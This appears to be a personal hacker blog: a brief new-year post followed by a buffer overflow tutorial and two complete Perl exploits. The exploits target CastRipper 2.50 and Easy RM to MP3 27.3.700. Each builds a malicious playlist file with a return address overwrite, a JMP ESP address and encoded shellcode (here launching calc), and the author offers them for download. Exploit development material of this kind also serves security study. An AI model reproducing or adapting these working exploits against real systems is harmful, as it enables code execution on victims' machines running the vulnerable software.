Happy new year

I learned a lot of things last year, lots of good stuff; it was one of the best years for me, but the ending was bad and hard to forget. Anyway, goodbye to 2009 and welcome to '10. Hoping this year will be better than the last.

I decided to forget the bad things that happened last year and look forward. Something ending doesn't mean it's the end of the world, right?
Some people say everything happens for the good, but what happened to me didn't happen for the good; I lost something that I can't replace.
This year my resolution is to forget what happened and look forward to a better future. Anyway, I decided to study hard and get good results, and hope that someday, somehow, I will get back what I lost XD

Exams are too near, so you won't see many updates till they end.

From 0x41414141 to the calc

Boring days, so I just thought I'd write something that will give me some peace. Yeah, I just wanna show you guys a quick DEMO of finding a buffer overflow vulnerability and exploiting it. Err, though I say it's a quick demonstration, it took me some time to write it all up.

I recently wrote a BoF exploit for CastRipper, so I will use it in this demonstration.

Before starting, I wanna tell you guys: to understand what I'm doing here you gotta have some background on this subject and be familiar with the tools that help me in this process.

I will use these tools in the entire demo:

1-OllyDbg (which I find cooler than WinDbg)

2-Metasploit Framework (an awesome tool/framework)

3-Windows XP installed on VMware

So let's attach our vulnerable program to the debugger, send our junk data to it and crash it.
Hopefully this small Perl script will crash it.
We are sending 5000 x41, which is nothing but 5000 A's.

my $file = "crush.pls";
my $junk = "\x41" x 5000;                      # 5000 A's
open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);                                # raw bytes, no newline translation
print $FILE $junk;
close($FILE);
print "pls File Created successfully\n";

After the crash the CPU registers will look like this:

[Screenshot: CPU registers after the crash, EIP = 41414141]

We can see EIP is overwritten with 41414141, which is AAAA from our buffer.
Great, we now control EIP; let's find the exact location to place our shellcode.

So let's modify our Perl script to send another buffer to the program to crash it. Now we are sending 25000 A's followed by 5000 B's.

my $file  = "crush25000.pls";
my $junk  = "\x41" x 25000;                    # 25000 A's
my $junk2 = "\x42" x 5000;                     # followed by 5000 B's
open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);
print $FILE $junk . $junk2;
close($FILE);
print "pls File Created successfully\n";

[Screenshot: CPU registers after the second crash, EIP = 42424242]

Great, now EIP is overwritten with 42424242, which is nothing but BBBB. So now we know the offset to EIP is between 25000 and 30000.

In order to find the exact location, we'll use Metasploit. I'm going to use the Windows version of Metasploit,
which is located in C:\program files\metasploit\framwork3

C:\program files\metasploit\framwork3\msf3\tools\pattern_create.rb 5000

It will create a unique 5000-byte pattern.
So let's modify our Perl script again.

my $file  = "crush25000.pls";
my $junk  = "\x41" x 25000;                    # 25000 A's
my $junk2 = "place the 5000 characters we created here";   # paste the pattern_create.rb output
open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);
print $FILE $junk . $junk2;
close($FILE);
print "pls File Created successfully\n";

[Screenshot: CPU registers after the third crash, EIP = 42316b42]

So now EIP is overwritten with 0x42316b42, four bytes of our unique pattern.
Let's find its offset. Here we go, the offset is 1076:

C:\program files\metasploit\framwork3\msf3\tools\pattern_offset.rb 0x42316b42 5000
1076
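The pattern_create / pattern_offset step above, reimplemented in Python as an added example (it is not the post's code and not Metasploit's own source): it builds the same Aa0Aa1Aa2... cyclic pattern, decodes the EIP value as a little-endian dword to find the 4 bytes that landed in it, and adds the 25000-byte filler the way the post's total of 26076 is derived. The function names and the `return_address_offset` helper are this example's own.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

MAX_LEN = len(ascii_uppercase) * len(ascii_lowercase) * len(digits) * 3   # 20280


def pattern_create(length):
    """Cyclic pattern in the Aa0Aa1Aa2...Ab0 scheme used by Metasploit's
    pattern_create.rb. Every 4-byte window is unique within the first
    20280 bytes, which is what lets one EIP value map to one offset."""
    if not 0 < length <= MAX_LEN:
        raise ValueError("length must be between 1 and %d" % MAX_LEN)
    triples = (u + l + d for u, l, d in product(ascii_uppercase, ascii_lowercase, digits))
    buf = ""
    for t in triples:
        if len(buf) >= length:
            break
        buf += t
    return buf[:length]


def pattern_offset(eip, length):
    """Offset inside the pattern of the 4 bytes that landed in EIP.
    x86 is little-endian, so the register value 0x44434241 corresponds
    to the bytes 'ABCD' as they were written to the file. -1 if absent."""
    needle = struct.pack("<I", eip)               # register value -> file bytes
    return pattern_create(length).encode("ascii").find(needle)


def eip_value_at(offset, length):
    """Inverse of pattern_offset: the EIP value a debugger would show if
    the saved return address sat `offset` bytes into the pattern."""
    chunk = pattern_create(length)[offset:offset + 4].encode("ascii")
    return struct.unpack("<I", chunk)[0]


def return_address_offset(prefix_len, eip, pattern_len):
    """Total bytes before the saved return address when the crash file was
    prefix_len filler bytes followed by a pattern_len pattern; the post's
    26076 is 25000 filler bytes plus the 1076 found inside the pattern."""
    off = pattern_offset(eip, pattern_len)
    return -1 if off < 0 else prefix_len + off


if __name__ == "__main__":
    value = eip_value_at(1076, 5000)   # constructed: what EIP shows for offset 1076
    print("EIP 0x%08x -> pattern offset %d, total offset %d"
          % (value, pattern_offset(value, 5000), return_address_offset(25000, value, 5000)))
```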

Jumping to the shellcode.

Executable modules

[Screenshot: OllyDbg executable modules list]

Because this is a quick demonstration I won't go into much detail about this. To find a JMP address you can use findjmp.c (which you can find on the internet; just compile it and run it).

Usage of findjmp (C:\findjmp kernel32.dll esp)

So I'm going to use this address, 0x7D113B1F, a JMP ESP from SHELL32.dll on WinXP SP3. You can replace this with some other address.

So let's write up the complete exploit. That's it XD. Don't worry, I skipped lots of stuff in this because it's just a demo. lol. peace.

#!/usr/bin/perl
my $file = "d3b4g.pls";
my $junk = "A" x 26076;           # filler up to the saved return address
my $eip  = pack('V', 0x7D113B1F);  # JMP ESP from SHELL32.dll WinXP SP3
my $shellcode = "\x90" x 25;       # NOPs
# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);                    # raw bytes, no newline translation
print $FILE $junk . $eip . $shellcode;
close($FILE);
print "pls File Created successfully\n";

CastRipper 2.50 Stack buffer Overflow Exploit

I wrote this exploit about 3 weeks ago and just sent it to Exploit-DB at Offensive Security. This application (CastRipper) suffers from a stack-based buffer overflow.

Get it from exploit-db

#!/usr/bin/perl
# CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3
# Exploit By : d3b4g
# my webpage www.d3b4g.info
# From tiny islands of Maldives
# Tested on Windows XP SP3
# 24.12.2009
# I used an address from SHELL32.dll. You can change it to your desired address. Use jmpfind.exe to find an address.
print "CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit\n";
print "Exploit By : d3b4g\n";
my $file = "d3b4g.pls";
my $junk = "A" x 26076;           # filler up to the saved return address
my $eip  = pack('V', 0x7D113B1F);  # JMP ESP from SHELL32.dll WinXP SP3
my $shellcode = "\x90" x 25;       # NOPs

# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);                    # raw bytes, no newline translation
print $FILE $junk . $eip . $shellcode;
close($FILE);
print "pls File Created successfully\n";

Exploit for Easy RM to MP3

Last night I was testing the available exploits for Easy RM to MP3 Converter and unfortunately none of them worked for me, so I decided to write my own exploit for that application. I wrote this exploit under Windows XP SP3 and tested it. This application suffers from a stack-based buffer overflow.

#!/usr/bin/perl
#
# Exploit for Easy RM to MP3 27.3.700 on Windows XP SP3
# By d3b4g
# tested on Windows XP SP3
# version: 27.3.700
# Date: 22.12.09
# From tiny islands of Maldives
#
my $file = "d3b4g.m3u";

my $junk = "A" x 26071;           # filler up to the saved return address
my $eip  = pack('V', 0x7C836A08);  # jmp esp from kernel32.dll
my $shellcode = "\x90" x 30;       # NOPs

# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);                    # raw bytes, no newline translation
print $FILE $junk . $eip . $shellcode;
close($FILE);
print "m3u File Created successfully\n";

Get it from exploit-db